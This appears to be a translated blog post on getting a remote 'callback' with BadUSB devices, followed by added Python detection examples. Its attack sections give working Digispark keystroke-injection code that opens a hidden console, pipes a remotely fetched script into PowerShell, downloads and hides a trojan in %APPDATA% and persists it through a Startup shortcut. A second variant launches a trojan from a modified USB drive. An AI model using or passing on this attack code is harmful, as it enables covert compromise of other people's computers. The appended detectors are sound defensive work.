Approach 1
The idea is to remotely download a .ps1 script and run it, which in turn downloads and runs an AV-evading trojan.
First, the BadUSB code:
```cpp
#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.sendKeyStroke(0);                   // empty report so the host syncs with the device
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(1000);
  // Open cmd with a 16x1 console so the window is barely visible
  DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Fetch the script and pipe it straight into PowerShell
  DigiKeyboard.println("curl http://ip/1.txt | powershell");
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("exit");
}

void loop() {
}
```
Now the PowerShell script:
```powershell
# Download the payload into %APPDATA% and start it with a hidden window
$exePath = Join-Path $env:APPDATA 'badusbhttp.exe'
(New-Object System.Net.WebClient).DownloadFile('http://ip/badusbhttp.txt', $exePath)
Start-Process $exePath -WindowStyle Hidden
# Persist by dropping a shortcut to it in the user's Startup folder
$startupPath = Join-Path $env:APPDATA 'Microsoft\\Windows\\Start Menu\\Programs\\Startup\\badusbhttp.lnk'
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($startupPath)
$Shortcut.TargetPath = $exePath
$Shortcut.Save()
```
This script downloads the malicious trojan file and then runs it to get a callback. Let's look at the result:
Callback successful.
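As an added example that is not part of the original post, the following Python detector runs over constructed Sysmon-style records and flags the traits of this chain that a defender can key on: a console deliberately shrunk to a single line, curl and PowerShell spawned from that console, an .exe dropped into the root of %APPDATA% by PowerShell, and a .lnk written to the Startup folder. The key=value log format and the field names are assumptions.

```python
"""Detection logic for the approach 1 chain (tiny cmd window, curl piped into
PowerShell, dropper written to %APPDATA%, Startup-folder .lnk).

Added example, not code from the original post. The records below are
constructed, Sysmon-style key=value lines; the field names are assumptions.
"""
import re

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """Turn one key=value record into a dict (quoted values keep their spaces)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


# Constructed sample telemetry: a benign cmd.exe first, then the chain from the post.
SAMPLE_EVENTS = [
    'event=ProcessCreate image="C:\\Windows\\System32\\cmd.exe" parent=explorer.exe cmdline="cmd /K dir"',
    'event=ProcessCreate image="C:\\Windows\\System32\\cmd.exe" parent=explorer.exe cmdline="cmd /T:01 /K mode CON: COLS=16 LINES=1"',
    'event=ProcessCreate image="C:\\Windows\\System32\\curl.exe" parent=cmd.exe cmdline="curl http://ip/1.txt"',
    'event=ProcessCreate image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" parent=cmd.exe cmdline="powershell"',
    'event=FileCreate image=powershell.exe target="C:\\Users\\u\\AppData\\Roaming\\badusbhttp.exe"',
    'event=FileCreate image=powershell.exe target="C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\badusbhttp.lnk"',
]

# A console resized to one line has no legitimate interactive use; it is a strong
# indicator of keystroke injection trying to keep the window out of sight.
SHRUNK_CONSOLE = re.compile(r'mode\s+CON:.*\bLINES=1\b', re.IGNORECASE)
APPDATA_EXE = re.compile(r'\\AppData\\Roaming\\[^\\]+\.exe$', re.IGNORECASE)
STARTUP_LNK = re.compile(r'\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$', re.IGNORECASE)
INTERPRETERS = ('curl.exe', 'powershell.exe')


def detect(lines):
    """Return (rule_name, evidence) tuples in the order the events were seen."""
    alerts = []
    shrunk_cmd_active = False  # set once a one-line console has been opened
    for ev in map(parse, lines):
        image = ev.get('image', '').lower()
        if ev.get('event') == 'ProcessCreate':
            cmdline = ev.get('cmdline', '')
            if image.endswith('cmd.exe') and SHRUNK_CONSOLE.search(cmdline):
                alerts.append(('console_window_shrunk', cmdline))
                shrunk_cmd_active = True
            elif (shrunk_cmd_active and ev.get('parent', '').lower() == 'cmd.exe'
                  and image.endswith(INTERPRETERS)):
                alerts.append(('downloader_or_interpreter_from_shrunk_console', ev['image']))
        elif ev.get('event') == 'FileCreate':
            target = ev.get('target', '')
            if image.endswith('powershell.exe') and APPDATA_EXE.search(target):
                alerts.append(('exe_dropped_in_appdata', target))
            elif STARTUP_LNK.search(target):
                alerts.append(('startup_lnk_created', target))
    return alerts


if __name__ == '__main__':
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f'{rule}: {evidence}')
```

The first rule alone is usually enough to page on; the later rules are kept separate so that a Startup-folder .lnk or an .exe dropped by PowerShell into %APPDATA% still raises an alert when the console-shrinking step is varied.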
Approach 2
Getting a callback by modifying the hardware. This idea comes from:
https://mp.weixin.qq.com/s/A2M1QBMnffO1CpjIaXePOA
You need to modify the circuit board yourself so that it becomes a combination of a normal USB drive and a BadUSB, then put the AV-evading trojan on the normal USB drive portion and have the BadUSB portion execute it.
BadUSB code:
```cpp
#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.sendKeyStroke(0);                   // empty report so the host syncs with the device
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R: open the Run dialog
  DigiKeyboard.delay(1000);
  // Open cmd with a 16x1 console so the window is barely visible
  DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // The drive letter of the storage half is unknown, so try D:, E: and F: in turn
  // (backslashes are escaped for the C string; the file name is the post's placeholder)
  DigiKeyboard.println("D:\\木马.exe");
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("E:\\木马.exe");
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("F:\\木马.exe");
  DigiKeyboard.println("exit");
}

void loop() {
}
```
Because we can't be sure which drive letter our drive will get, we have to try several.
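Added example in Python (not from the original post) for the hardware variant above: the signal a defender can use is a single USB container that enumerates both a keyboard and a disk, followed within a short window by cmd.exe starting an executable from the root of a non-system drive. The telemetry format, the container ids, the field names and the 30-second window are assumptions, and the file name payload.exe is constructed.

```python
"""Detect approach 2 in endpoint telemetry: a device that enumerates both a
keyboard and a mass-storage interface, followed by a program started from
the root of a non-system drive shortly afterwards.

Added example, not part of the original post. The records are constructed
key=value lines with assumed field names (event, t = seconds, container =
the USB container/parent id, class, image, parent).
"""
import re

WINDOW_SECONDS = 30  # how long after a new keyboard appears we stay suspicious (assumption)

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """Turn one key=value record into a dict (quoted values keep their spaces)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


# Constructed sample: container usb7 shows up as both a keyboard and a disk,
# then cmd.exe starts an .exe from the root of E: a few seconds later.
SAMPLE_EVENTS = [
    'event=DeviceArrival t=100 container=usb3 class=Keyboard',  # the real keyboard at boot
    'event=ProcessCreate t=400 parent=explorer.exe image="C:\\Program Files\\App\\app.exe"',
    'event=DeviceArrival t=1000 container=usb7 class=Keyboard',
    'event=DeviceArrival t=1001 container=usb7 class=DiskDrive',
    'event=ProcessCreate t=1003 parent=explorer.exe image="C:\\Windows\\System32\\cmd.exe"',
    'event=ProcessCreate t=1006 parent=cmd.exe image="E:\\payload.exe"',
]

# An .exe sitting directly in the root of D: .. Z: (not the system drive)
DRIVE_ROOT_EXE = re.compile(r'^[D-Z]:\\[^\\]+\.exe$', re.IGNORECASE)


def detect(lines):
    """Return (rule_name, evidence) tuples in the order the events were seen."""
    alerts = []
    keyboard_seen = {}   # container id -> time its keyboard interface arrived
    storage_seen = {}    # container id -> time its disk interface arrived
    last_keyboard_t = None
    for ev in map(parse, lines):
        t = int(ev['t'])
        if ev['event'] == 'DeviceArrival':
            c = ev['container']
            if ev['class'] == 'Keyboard':
                keyboard_seen[c] = t
                last_keyboard_t = t
            elif ev['class'] == 'DiskDrive':
                storage_seen[c] = t
            # One physical device presenting both a keyboard and a disk is the
            # combined board described in the post; flag it once both halves are seen.
            if c in keyboard_seen and c in storage_seen:
                alerts.append(('composite_keyboard_plus_storage', c))
        elif ev['event'] == 'ProcessCreate':
            img = ev['image']
            if (DRIVE_ROOT_EXE.match(img) and ev['parent'].lower() == 'cmd.exe'
                    and last_keyboard_t is not None
                    and 0 <= t - last_keyboard_t <= WINDOW_SECONDS):
                alerts.append(('drive_root_exe_after_new_keyboard', img))
    return alerts


if __name__ == '__main__':
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f'{rule}: {evidence}')
```

The composite-device rule needs no process telemetry at all, so it also fits a device-control policy: a host that only ever expects storage from a removable device can refuse the keyboard interface of the same container outright.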